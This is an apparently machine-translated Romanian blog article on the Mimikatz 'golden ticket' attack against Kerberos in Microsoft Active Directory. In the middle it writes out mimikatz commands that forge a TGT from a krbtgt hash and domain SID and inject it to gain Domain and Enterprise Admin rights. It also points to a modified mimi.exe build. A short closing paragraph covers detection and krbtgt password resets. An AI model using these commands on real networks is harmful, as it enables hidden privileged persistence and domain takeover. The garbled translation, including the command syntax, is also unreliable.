La începutul acestui an, Benjamin Delpy aka gentilkiwi din nou mulțumit cu un alt studiu comunitar și, ca urmare, noi funcționalități în asamblarea lor epic numit Mimikatz. Este vorba despre utilizarea funcțiilor arhitecturale ale serviciului Kerberos din Microsoft Active Directory pentru a ascunde accesul privilegiat pe resursele domeniului. Pentru a înțelege valoarea excavării gentilkiwi, merită să vă răsturnați cunoștințele în contextul protocolului Kerberos și al locului său în serviciul de directoare Microsoft.
Nu urcând în jungla protocolului, în general, autentificarea Kerberos se bazează pe "bilete de acces". Pentru a avea acces la resursa, clientul oferă acces biletul, și de resurse, la rândul său, pe baza de magie criptografic, verifică biletul de acces și decide ce drepturi învestită cu clientul și a pus-le pe toate dacă acesta. Un rol special în acest proces este ocupat de serverele de autentificare, care sunt responsabile pentru emiterea biletelor de acces sacru. În Microsoft Active Directory, controlorii de domeniu execută această funcție.
Începând cu cea de-a patra versiune a programului Kerberos, există un lucru util ca TGT (Ticket Granting Ticket). Este această versiune a protocolului Kerberos, pe care corporația bună o fortifică în soluția sa pentru gestionarea centralizată a rețelei, denumită mai târziu Microsoft Active Directory.
La prima vedere, totul este minunat! Este îngrămădit jamburile în punerea în aplicare ... Deși cine nu le-a avut? [tynz] Acum, desigur, astfel de bug-uri sunt fixe și companii serioase care au crescut împreună cu toate părțile din infrastructura lor IT cu MS AD poate respira un oftat de ușurare, dar ...
"Este greu să fii Dumnezeu, dar cineva trebuie să fie ..." (c)
Ultima condiție este necesară numai în momentul utilizării privilegiilor cusute de mimakaz. Generarea biletului TGT poate avea loc oriunde.
mimikatz.exe "kerberos :: aur / admin: ANYID /domain:TEST.LOCAL / sid: S-1-5-21-3838653977-3010990090-570996099 / krbtgt: C1E209654807223D8CB17376FCB70E53 / bilet: myfile" ieșire
kerberos :: golden - sunați la funcția de generare a biletului TGT
/ admin: ANYID - aici puteți scrie un identificator arbitrar (se va aprinde în jurnalul de securitate)
/domain:TEST.LOCAL - domeniul țintă
/ sid: S-1-5-21-3838653977-3010990090-570996099 - ID-ul domeniului țintă
/ krbtgt: C1E209654807223D8CB17376FCB70E53 - NTLM hash a utilizatorului krbtgt
/ bilet: myfile - numele fișierului la care va fi înregistrat noul bilet TGT
După generarea acestui fișier, vom reveni la computerul de domeniu și vom încărca biletul magic "de aur" al Kerberos:
mimikatz.exe "kerberos :: ptt myfile" ieșire
În ansamblul finalizat al lui Mimikatz, proprietarul biletului de aur TGT devine participant la următoarele grupuri de securitate:
- SID 512 - administratori de domeniu
- SID 513 - utilizatori de domenii
- SID 518 - administratorii schemei
- SID 519 - Administratori de întreprinderi
- SID 520 - Proprietarii creatorilor de politici de grup
În astfel de cazuri, este posibil să se asambleze versiunea lui Mimikatz (beneficii sortsy sunt disponibile în mod liber, cu indicații detaliate cu privire la ansamblul). Cel mai bun este leneș se poate ridica versiunea finit îmbunătățită în ceea ce privește generarea TGT aici (mimi.exe / MD5 324ac76502379a869485f7a404dd1570). Au apărut doi parametri noi:
- / userid este propriul SID al utilizatorului
- / groupsid - care membru al grupului ar trebui să fie (în plus față de administratori de domeniu, întreprinderi etc.)
mimi.exe „kerberos :: aur / admin: ANONIM /domain:TEST.LOCAL / sid: S-1-5-21-3838653977-3010990090-570996099 / krbtgt: C1E209654807223D8CB17376FCB70E53 / bilet: myfile2 / usersid: 501 / groupsid: 1120 „ieșire
mimi.exe "kerberos :: ptt myfile2" ieșire
Sunt de acord cu punctul de vedere forensiki amuzant lucru se dovedește :)) otmonitoreny Activitate atacator pentru a putea să-l separe de activitatea acestor utilizatori legitimi și conturi de servicii atunci când aceste oportunități vor fi oh cât de dificil, dacă nu chiar imposibil. Dar, pentru a preveni (re) accesul neautorizat, puteți schimba parola de utilizator krbtgt. Și trebuie să schimbați parola de două ori (o altă caracteristică fină a krbtgt), apoi denaturând serviciul KDC, și de ceas ca (temporar sau permanent) cad serviciile legate de Active Directory ... astfel încât, până la următorul eveniment este compromis heshika krbtgt :)
Articole similare
Trimiteți-le prietenilor: